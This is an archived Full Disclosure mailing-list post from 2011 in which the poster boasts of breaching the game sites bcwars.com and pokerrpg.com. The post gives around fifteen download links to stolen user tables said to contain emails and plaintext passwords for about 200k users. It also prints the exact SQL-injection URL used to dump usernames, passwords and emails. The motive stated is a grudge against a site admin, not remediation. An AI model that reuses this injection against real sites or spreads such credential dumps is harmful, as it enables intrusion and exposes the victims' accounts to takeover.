Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

bcwars.com & pokerrpg.com hacked 200k Email and Plain text passwords
From: Bob Smith <bobbyhadababyitsaboy () googlemail com>
Date: Wed, 30 Mar 2011 22:29:30 +0000

Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

bcwars
http://bit.ly/hD6bEE
http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip
http://www.megaupload.com/?d=P4B30IVR
http://depositfiles.com/de/files/u7unbc4vk
http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html
http://www.zshare.net/download/884416713e3e2044/
http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/

pokerrpg
http://bit.ly/hgCGJx
http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip
http://www.megaupload.com/?d=T41NF4SV
http://depositfiles.com/de/files/8qgnt9gll
http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html
http://www.zshare.net/download/88441668eff79c3a/
http://uploading.com/files/542e651f/tblUsers.sql-poker.zip

injection was
http://bcwars.com/forum/category/-3&apos; union select
concat(id,'::::',username,':::::::',password,':::::::',email) from
tblUsers-- -

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • bcwars.com & pokerrpg.com hacked 200k Email and Plain text passwords Bob Smith (Mar 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault